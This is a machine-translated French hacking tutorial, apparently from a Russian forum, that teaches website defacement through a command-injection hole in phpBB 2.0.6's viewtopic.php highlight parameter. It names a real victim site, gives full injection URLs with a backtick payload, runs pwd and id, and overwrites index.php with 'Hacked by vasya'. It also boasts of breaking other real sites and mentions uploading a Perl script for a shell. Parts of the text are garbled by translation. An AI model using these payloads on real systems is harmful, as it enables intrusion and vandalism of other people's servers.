This page has been robot translated, sorry for typos if any. Original content here.

Un guide complet pour déférer (mis à jour)

Introduction
Je vois souvent la question sur le forum: "Comment casser des sites?" ou "Comment définir un site?". Aujourd'hui, vous serez en mesure de désosser le portail sans y mettre une goutte d'effort! J'invite tous les amoureux de proies faciles! =)

Partie principale
Aujourd'hui, je parlerai de la manière dont les sites par défaut sont configurés par défaut, par le biais d'erreurs dans des scripts populaires. Une grave faille de sécurité a récemment été découverte dans le moteur populaire phpBB.
Une vulnérabilité a été découverte dans le module viewtopic.php.

Le fait est qu'un attaquant distant pourrait exécuter un script php arbitraire sur un système vulnérable en transférant quelque chose comme la ligne viewtopic.php? T = 1 & highlight =% 27

Comme vous l'avez probablement deviné, cette vulnérabilité vous permet d'exécuter des commandes arbitraires de toute longueur sur un serveur vulnérable. Aujourd'hui, nous allons utiliser ce trou et avec vous, nous allons casser un serveur réel. Notre objectif sera précisément de déformer, c'est-à-dire de remplacer la page principale du site par la nôtre.

Commençons donc, notre victime sera www.maxmuscle.dk (au moment de la publication de l'article, le portail résiste à la vulnérabilité).
La première chose qui nous frappe lorsque nous visitons cette page est qu’elle est basée sur le système de portail php-nuke.

Le forum par défaut pour ce système est phpBB. Nous cliquons sur le lien qui nous mène au forum (http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&file=index.php) et nous assurons qu'il s'agit bien de phpBB version 2.0.6 .

Nous donnons au forum une demande de ce type:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&fileе = viewtopic.php & t = 2 & highlight =% 27. $ poster = `$ ls`.% 27 & l s =

et nous découvrons que le moteur a absorbé la ligne, ce qui est indiqué par l’inscription caractéristique au lieu du surnom de l’un des utilisateurs: ") #i". Mais cela ne veut rien dire, nous pouvons facilement interrompre l'exécution des commandes sur ce serveur, mais nous ne devinerons pas et essayerons simplement de l'exécuter:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s = pwd

Cette commande (pwd) devrait nous indiquer le répertoire dans lequel nous nous trouvons. Si cela se produit, il s'ensuit que l'exécution de commandes sur le serveur est possible. C'est ce qui se passe. Le chemin du répertoire / var / www / html / osclux / est affiché. La commande suivante suit “id” pour vérifier notre accès.

Comme nous le voyons, nous avons les droits uid = 99 (personne) , c’est-à-dire les droits du serveur Web. Maintenant, nous listons les dossiers et les fichiers dans le répertoire html_public, avec la commande "dir / var / www / html / osclux" et trouvons ce dont nous avons tant besoin pour defeys index.php réside dans ce répertoire.

Nous sommes donc à la ligne d'arrivée - en exécutant la commande echo Hacked by vasya> index.php , nous afficherons l'inscription "Hacked by vasya" sur la page principale. Nous vérifions. Il s'est avéré.

Vous avez fait une déformation.

Au lieu de conclusion
C’est le moyen le plus simple de réparer hackzona.ru, c’est ainsi que le forum sur nsd.ru a été rompu. Je remarque également qu’il s’agit de la mise en œuvre la plus simple de ce trou: dans de bonnes conditions, vous pouvez facilement télécharger un script Perl sur un serveur écoutant un port spécifique et obtenir un shell à part entière sans aucun droit.